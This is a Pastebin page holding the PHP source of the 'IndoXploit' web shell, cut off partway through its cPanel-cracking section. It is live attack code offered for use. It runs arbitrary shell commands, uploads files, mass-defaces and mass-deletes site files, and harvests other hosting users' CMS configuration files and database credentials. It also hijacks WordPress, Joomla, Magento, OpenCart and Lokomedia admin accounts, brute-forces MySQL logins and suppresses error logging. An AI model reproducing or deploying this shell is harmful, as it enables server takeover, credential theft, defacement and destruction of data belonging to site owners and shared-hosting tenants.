API tools faq
paste
Guest User

Untitled

a guest
Jul 28th, 2017
56
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 66.69 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>IndoXploit</title>
  4. <meta name='author' content='IndoXploit'>
  5. <meta charset="UTF-8">
  6. <style type='text/css'>
  7. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  8. html {
  9. background: #000000;
  10. color: #ffffff;
  11. font-family: 'Ubuntu';
  12. font-size: 13px;
  13. width: 100%;
  14. }
  15. li {
  16. display: inline;
  17. margin: 5px;
  18. padding: 5px;
  19. }
  20. table, th, td {
  21. border-collapse:collapse;
  22. font-family: Tahoma, Geneva, sans-serif;
  23. background: transparent;
  24. font-family: 'Ubuntu';
  25. font-size: 13px;
  26. }
  27. .table_home, .th_home, .td_home {
  28. border: 1px solid #ffffff;
  29. }
  30. th {
  31. padding: 10px;
  32. }
  33. a {
  34. color: #ffffff;
  35. text-decoration: none;
  36. }
  37. a:hover {
  38. color: gold;
  39. text-decoration: underline;
  40. }
  41. b {
  42. color: gold;
  43. }
  44. input[type=text], input[type=password],input[type=submit] {
  45. background: transparent;
  46. color: #ffffff;
  47. border: 1px solid #ffffff;
  48. margin: 5px auto;
  49. padding-left: 5px;
  50. font-family: 'Ubuntu';
  51. font-size: 13px;
  52. }
  53. textarea {
  54. border: 1px solid #ffffff;
  55. width: 100%;
  56. height: 400px;
  57. padding-left: 5px;
  58. margin: 10px auto;
  59. resize: none;
  60. background: transparent;
  61. color: #ffffff;
  62. font-family: 'Ubuntu';
  63. font-size: 13px;
  64. }
  65. </style>
  66. </head>
  67. <?php
  68. ###############################################################################
  69. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  70. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  71. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  72. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  73. // Greetz: All Member IndoXploit. & all my friends.
  74. ###############################################################################
  75. function w($dir,$perm) {
  76. if(!is_writable($dir)) {
  77. return "<font color=red>".$perm."</font>";
  78. } else {
  79. return "<font color=lime>".$perm."</font>";
  80. }
  81. }
  82. function exe($cmd) {
  83. if(function_exists('system')) {
  84. @ob_start();
  85. @system($cmd);
  86. $buff = @ob_get_contents();
  87. @ob_end_clean();
  88. return $buff;
  89. } elseif(function_exists('exec')) {
  90. @exec($cmd,$results);
  91. $buff = "";
  92. foreach($results as $result) {
  93. $buff .= $result;
  94. } return $buff;
  95. } elseif(function_exists('passthru')) {
  96. @ob_start();
  97. @passthru($cmd);
  98. $buff = @ob_get_contents();
  99. @ob_end_clean();
  100. return $buff;
  101. } elseif(function_exists('shell_exec')) {
  102. $buff = @shell_exec($cmd);
  103. return $buff;
  104. }
  105. }
  106. function perms($file){
  107. $perms = fileperms($file);
  108. if (($perms & 0xC000) == 0xC000) {
  109. // Socket
  110. $info = 's';
  111. } elseif (($perms & 0xA000) == 0xA000) {
  112. // Symbolic Link
  113. $info = 'l';
  114. } elseif (($perms & 0x8000) == 0x8000) {
  115. // Regular
  116. $info = '-';
  117. } elseif (($perms & 0x6000) == 0x6000) {
  118. // Block special
  119. $info = 'b';
  120. } elseif (($perms & 0x4000) == 0x4000) {
  121. // Directory
  122. $info = 'd';
  123. } elseif (($perms & 0x2000) == 0x2000) {
  124. // Character special
  125. $info = 'c';
  126. } elseif (($perms & 0x1000) == 0x1000) {
  127. // FIFO pipe
  128. $info = 'p';
  129. } else {
  130. // Unknown
  131. $info = 'u';
  132. }
  133. // Owner
  134. $info .= (($perms & 0x0100) ? 'r' : '-');
  135. $info .= (($perms & 0x0080) ? 'w' : '-');
  136. $info .= (($perms & 0x0040) ?
  137. (($perms & 0x0800) ? 's' : 'x' ) :
  138. (($perms & 0x0800) ? 'S' : '-'));
  139. // Group
  140. $info .= (($perms & 0x0020) ? 'r' : '-');
  141. $info .= (($perms & 0x0010) ? 'w' : '-');
  142. $info .= (($perms & 0x0008) ?
  143. (($perms & 0x0400) ? 's' : 'x' ) :
  144. (($perms & 0x0400) ? 'S' : '-'));
  145. // World
  146. $info .= (($perms & 0x0004) ? 'r' : '-');
  147. $info .= (($perms & 0x0002) ? 'w' : '-');
  148. $info .= (($perms & 0x0001) ?
  149. (($perms & 0x0200) ? 't' : 'x' ) :
  150. (($perms & 0x0200) ? 'T' : '-'));
  151. return $info;
  152. }
  153. function hdd($s) {
  154. if($s >= 1073741824)
  155. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  156. elseif($s >= 1048576)
  157. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  158. elseif($s >= 1024)
  159. return sprintf('%1.2f',$s / 1024 ) .' KB';
  160. else
  161. return $s .' B';
  162. }
  163. function ambilKata($param, $kata1, $kata2){
  164. if(strpos($param, $kata1) === FALSE) return FALSE;
  165. if(strpos($param, $kata2) === FALSE) return FALSE;
  166. $start = strpos($param, $kata1) + strlen($kata1);
  167. $end = strpos($param, $kata2, $start);
  168. $return = substr($param, $start, $end - $start);
  169. return $return;
  170. }
  171. if(get_magic_quotes_gpc()) {
  172. function idx_ss($array) {
  173. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  174. }
  175. $_POST = idx_ss($_POST);
  176. }
  177.  
  178. error_reporting(0);
  179. error_log(0);
  180. @ini_set('error_log',NULL);
  181. @ini_set('log_errors',0);
  182. @ini_set('max_execution_time',0);
  183. @set_time_limit(0);
  184. @set_magic_quotes_runtime(0);
  185. if(isset($_GET['dir'])) {
  186. $dir = $_GET['dir'];
  187. chdir($_GET['dir']);
  188. } else {
  189. $dir = getcwd();
  190. }
  191. $dir = str_replace("\\","/",$dir);
  192. $scdir = explode("/", $dir);
  193. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  194. $ds = @ini_get("disable_functions");
  195. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  196. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  197. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  198. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  199. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  200. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  201. if(!function_exists('posix_getegid')) {
  202. $user = @get_current_user();
  203. $uid = @getmyuid();
  204. $gid = @getmygid();
  205. $group = "?";
  206. } else {
  207. $uid = @posix_getpwuid(posix_geteuid());
  208. $gid = @posix_getgrgid(posix_getegid());
  209. $user = $uid['name'];
  210. $uid = $uid['uid'];
  211. $group = $gid['name'];
  212. $gid = $gid['gid'];
  213. }
  214. echo "System: <font color=lime>".php_uname()."</font><br>";
  215. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  216. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  217. echo "HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font><br>";
  218. echo "Safe Mode: $sm<br>";
  219. echo "Disable Functions: $show_ds<br>";
  220. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  221. echo "Current DIR: ";
  222. foreach($scdir as $c_dir => $cdir) {
  223. echo "<a href='?dir=";
  224. for($i = 0; $i <= $c_dir; $i++) {
  225. echo $scdir[$i];
  226. if($i != $c_dir) {
  227. echo "/";
  228. }
  229. }
  230. echo "'>$cdir</a>/";
  231. }
  232. echo "<hr>";
  233. echo "<center>";
  234. echo "<ul>";
  235. echo "<li>[ <a href='?'>Home</a> ]</li>";
  236. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  237. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  238. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  239. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  240. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  241. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  242. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  243. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  244. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  245. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  246. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  247. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  248. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  249. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  250. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  251. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  252. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  253. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  254. echo "</ul>";
  255. echo "</center>";
  256. echo "<hr>";
  257. if($_GET['do'] == 'upload') {
  258. echo "<center>";
  259. if($_POST['upload']) {
  260. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  261. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  262. } else {
  263. $act = "<font color=red>failed to upload file</font>";
  264. }
  265. }
  266. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  267. echo $act;
  268. echo "</center>";
  269. } elseif($_GET['do'] == 'cmd') {
  270. echo "<form method='post'>
  271. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  272. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  273. </form>";
  274. if($_POST['do_cmd']) {
  275. echo "<pre>".exe($_POST['cmd'])."</pre>";
  276. }
  277. } elseif($_GET['do'] == 'mass_deface') {
  278. function sabun_massal($dir,$namafile,$isi_script) {
  279. if(is_writable($dir)) {
  280. $dira = scandir($dir);
  281. foreach($dira as $dirb) {
  282. $dirc = "$dir/$dirb";
  283. $lokasi = $dirc.'/'.$namafile;
  284. if($dirb === '.') {
  285. file_put_contents($lokasi, $isi_script);
  286. } elseif($dirb === '..') {
  287. file_put_contents($lokasi, $isi_script);
  288. } else {
  289. if(is_dir($dirc)) {
  290. if(is_writable($dirc)) {
  291. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  292. file_put_contents($lokasi, $isi_script);
  293. $idx = sabun_massal($dirc,$namafile,$isi_script);
  294. }
  295. }
  296. }
  297. }
  298. }
  299. }
  300. function sabun_biasa($dir,$namafile,$isi_script) {
  301. if(is_writable($dir)) {
  302. $dira = scandir($dir);
  303. foreach($dira as $dirb) {
  304. $dirc = "$dir/$dirb";
  305. $lokasi = $dirc.'/'.$namafile;
  306. if($dirb === '.') {
  307. file_put_contents($lokasi, $isi_script);
  308. } elseif($dirb === '..') {
  309. file_put_contents($lokasi, $isi_script);
  310. } else {
  311. if(is_dir($dirc)) {
  312. if(is_writable($dirc)) {
  313. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  314. file_put_contents($lokasi, $isi_script);
  315. }
  316. }
  317. }
  318. }
  319. }
  320. }
  321. if($_POST['start']) {
  322. if($_POST['tipe_sabun'] == 'mahal') {
  323. echo "<div style='margin: 5px auto; padding: 5px'>";
  324. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  325. echo "</div>";
  326. } elseif($_POST['tipe_sabun'] == 'murah') {
  327. echo "<div style='margin: 5px auto; padding: 5px'>";
  328. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  329. echo "</div>";
  330. }
  331. } else {
  332. echo "<center>";
  333. echo "<form method='post'>
  334. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  335. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  336. <font style='text-decoration: underline;'>Folder:</font><br>
  337. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  338. <font style='text-decoration: underline;'>Filename:</font><br>
  339. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  340. <font style='text-decoration: underline;'>Index File:</font><br>
  341. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  342. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  343. </form></center>";
  344. }
  345. } elseif($_GET['do'] == 'mass_delete') {
  346. function hapus_massal($dir,$namafile) {
  347. if(is_writable($dir)) {
  348. $dira = scandir($dir);
  349. foreach($dira as $dirb) {
  350. $dirc = "$dir/$dirb";
  351. $lokasi = $dirc.'/'.$namafile;
  352. if($dirb === '.') {
  353. if(file_exists("$dir/$namafile")) {
  354. unlink("$dir/$namafile");
  355. }
  356. } elseif($dirb === '..') {
  357. if(file_exists("".dirname($dir)."/$namafile")) {
  358. unlink("".dirname($dir)."/$namafile");
  359. }
  360. } else {
  361. if(is_dir($dirc)) {
  362. if(is_writable($dirc)) {
  363. if(file_exists($lokasi)) {
  364. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  365. unlink($lokasi);
  366. $idx = hapus_massal($dirc,$namafile);
  367. }
  368. }
  369. }
  370. }
  371. }
  372. }
  373. }
  374. if($_POST['start']) {
  375. echo "<div style='margin: 5px auto; padding: 5px'>";
  376. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  377. echo "</div>";
  378. } else {
  379. echo "<center>";
  380. echo "<form method='post'>
  381. <font style='text-decoration: underline;'>Folder:</font><br>
  382. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  383. <font style='text-decoration: underline;'>Filename:</font><br>
  384. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  385. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  386. </form></center>";
  387. }
  388. } elseif($_GET['do'] == 'config') {
  389. $etc = fopen("/etc/passwd", "r");
  390. $idx = mkdir("idx_config", 0777);
  391. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  392. $htc = fopen("idx_config/.htaccess","w");
  393. fwrite($htc, $isi_htc);
  394. while($passwd = fgets($etc)) {
  395. if($passwd == "" || !$etc) {
  396. echo "<font color=red>Can't read /etc/passwd</font>";
  397. } else {
  398. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  399. foreach($user_config[1] as $user_idx) {
  400. $user_config_dir = "/home/$user_idx/public_html/";
  401. if(is_readable($user_config_dir)) {
  402. $grab_config = array(
  403. "/home/$user_idx/.my.cnf" => "cpanel",
  404. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  405. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  406. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  407. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  408. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  409. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  410. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  411. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  412. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  413. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  414. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  415. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  416. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  417. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  418. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  419. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  420. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  421. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  422. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  423. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  424. foreach($grab_config as $config => $nama_config) {
  425. $ambil_config = file_get_contents($config);
  426. if($ambil_config == '') {
  427. } else {
  428. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  429. fputs($file_config,$ambil_config);
  430. }
  431. }
  432. }
  433. }
  434. }
  435. }
  436. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  437. } elseif($_GET['do'] == 'jumping') {
  438. $i = 0;
  439. echo "<pre><div class='margin: 5px auto;'>";
  440. $etc = fopen("/etc/passwd", "r");
  441. while($passwd = fgets($etc)) {
  442. if($passwd == '' || !$etc) {
  443. echo "<font color=red>Can't read /etc/passwd</font>";
  444. } else {
  445. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  446. foreach($user_jumping[1] as $user_idx_jump) {
  447. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  448. if(is_readable($user_jumping_dir)) {
  449. $i++;
  450. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  451. if(is_writable($user_jumping_dir)) {
  452. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  453. }
  454. echo $jrw;
  455. if(function_exists('posix_getpwuid')) {
  456. $domain_jump = file_get_contents("/etc/named.conf");
  457. if($domain_jump == '') {
  458. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  459. } else {
  460. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  461. foreach($domains_jump[1] as $dj) {
  462. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  463. $user_jumping_url = $user_jumping_url['name'];
  464. if($user_jumping_url == $user_idx_jump) {
  465. echo " => ( <u>$dj</u> )<br>";
  466. break;
  467. }
  468. }
  469. }
  470. } else {
  471. echo "<br>";
  472. }
  473. }
  474. }
  475. }
  476. }
  477. if($i == 0) {
  478. } else {
  479. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  480. }
  481. echo "</div></pre>";
  482. } elseif($_GET['do'] == 'auto_edit_user') {
  483. if($_POST['hajar']) {
  484. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  485. echo "username atau password harus lebih dari 6 karakter";
  486. } else {
  487. $user_baru = $_POST['user_baru'];
  488. $pass_baru = md5($_POST['pass_baru']);
  489. $conf = $_POST['config_dir'];
  490. $scan_conf = scandir($conf);
  491. foreach($scan_conf as $file_conf) {
  492. if(!is_file("$conf/$file_conf")) continue;
  493. $config = file_get_contents("$conf/$file_conf");
  494. if(preg_match("/JConfig|joomla/",$config)) {
  495. $dbhost = ambilkata($config,"host = '","'");
  496. $dbuser = ambilkata($config,"user = '","'");
  497. $dbpass = ambilkata($config,"password = '","'");
  498. $dbname = ambilkata($config,"db = '","'");
  499. $dbprefix = ambilkata($config,"dbprefix = '","'");
  500. $prefix = $dbprefix."users";
  501. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  502. $db = mysql_select_db($dbname);
  503. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  504. $result = mysql_fetch_array($q);
  505. $id = $result['id'];
  506. $site = ambilkata($config,"sitename = '","'");
  507. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  508. echo "Config => ".$file_conf."<br>";
  509. echo "CMS => Joomla<br>";
  510. if($site == '') {
  511. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  512. } else {
  513. echo "Sitename => $site<br>";
  514. }
  515. if(!$update OR !$conn OR !$db) {
  516. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  517. } else {
  518. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  519. }
  520. mysql_close($conn);
  521. } elseif(preg_match("/WordPress/",$config)) {
  522. $dbhost = ambilkata($config,"DB_HOST', '","'");
  523. $dbuser = ambilkata($config,"DB_USER', '","'");
  524. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  525. $dbname = ambilkata($config,"DB_NAME', '","'");
  526. $dbprefix = ambilkata($config,"table_prefix = '","'");
  527. $prefix = $dbprefix."users";
  528. $option = $dbprefix."options";
  529. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  530. $db = mysql_select_db($dbname);
  531. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  532. $result = mysql_fetch_array($q);
  533. $id = $result[ID];
  534. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  535. $result2 = mysql_fetch_array($q2);
  536. $target = $result2[option_value];
  537. if($target == '') {
  538. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  539. } else {
  540. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  541. }
  542. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  543. echo "Config => ".$file_conf."<br>";
  544. echo "CMS => Wordpress<br>";
  545. echo $url_target;
  546. if(!$update OR !$conn OR !$db) {
  547. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  548. } else {
  549. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  550. }
  551. mysql_close($conn);
  552. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  553. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  554. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  555. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  556. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  557. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  558. $prefix = $dbprefix."admin_user";
  559. $option = $dbprefix."core_config_data";
  560. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  561. $db = mysql_select_db($dbname);
  562. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  563. $result = mysql_fetch_array($q);
  564. $id = $result[user_id];
  565. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  566. $result2 = mysql_fetch_array($q2);
  567. $target = $result2[value];
  568. if($target == '') {
  569. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  570. } else {
  571. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  572. }
  573. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  574. echo "Config => ".$file_conf."<br>";
  575. echo "CMS => Magento<br>";
  576. echo $url_target;
  577. if(!$update OR !$conn OR !$db) {
  578. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  579. } else {
  580. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  581. }
  582. mysql_close($conn);
  583. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  584. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  585. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  586. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  587. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  588. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  589. $prefix = $dbprefix."user";
  590. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  591. $db = mysql_select_db($dbname);
  592. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  593. $result = mysql_fetch_array($q);
  594. $id = $result[user_id];
  595. $target = ambilkata($config,"HTTP_SERVER', '","'");
  596. if($target == '') {
  597. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  598. } else {
  599. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  600. }
  601. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  602. echo "Config => ".$file_conf."<br>";
  603. echo "CMS => OpenCart<br>";
  604. echo $url_target;
  605. if(!$update OR !$conn OR !$db) {
  606. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  607. } else {
  608. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  609. }
  610. mysql_close($conn);
  611. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  612. $dbhost = ambilkata($config,'server = "','"');
  613. $dbuser = ambilkata($config,'username = "','"');
  614. $dbpass = ambilkata($config,'password = "','"');
  615. $dbname = ambilkata($config,'database = "','"');
  616. $prefix = "users";
  617. $option = "identitas";
  618. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  619. $db = mysql_select_db($dbname);
  620. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  621. $result = mysql_fetch_array($q);
  622. $target = $result[alamat_website];
  623. if($target == '') {
  624. $target2 = $result[url];
  625. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  626. if($target2 == '') {
  627. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  628. } else {
  629. $cek_login3 = file_get_contents("$target2/adminweb/");
  630. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  631. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  632. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  633. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  634. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  635. } else {
  636. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  637. }
  638. }
  639. } else {
  640. $cek_login = file_get_contents("$target/adminweb/");
  641. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  642. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  643. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  644. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  645. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  646. } else {
  647. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  648. }
  649. }
  650. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  651. echo "Config => ".$file_conf."<br>";
  652. echo "CMS => Lokomedia<br>";
  653. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  654. echo $url_target2;
  655. } else {
  656. echo $url_target;
  657. }
  658. if(!$update OR !$conn OR !$db) {
  659. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  660. } else {
  661. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  662. }
  663. mysql_close($conn);
  664. }
  665. }
  666. }
  667. } else {
  668. echo "<center>
  669. <h1>Auto Edit User Config</h1>
  670. <form method='post'>
  671. DIR Config: <br>
  672. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  673. Set User & Pass: <br>
  674. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  675. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  676. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  677. </form>
  678. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  679. ";
  680. }
  681. } elseif($_GET['do'] == 'cpanel') {
  682. if($_POST['crack']) {
  683. $usercp = explode("\r\n", $_POST['user_cp']);
  684. $passcp = explode("\r\n", $_POST['pass_cp']);
  685. $i = 0;
  686. foreach($usercp as $ucp) {
  687. foreach($passcp as $pcp) {
  688. if(@mysql_connect('localhost', $ucp, $pcp)) {
  689. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  690. } else {
  691. $_SESSION[$ucp] = "1";
  692. $_SESSION[$pcp] = "1";
  693. if($ucp == '' || $pcp == '') {
  694.  
  695. } else {
  696. $i++;
  697. if(function_exists('posix_getpwuid')) {
  698. $domain_cp = file_get_contents("/etc/named.conf");
  699. if($domain_cp == '') {
  700. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  701. } else {
  702. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  703. foreach($domains_cp[1] as $dj) {
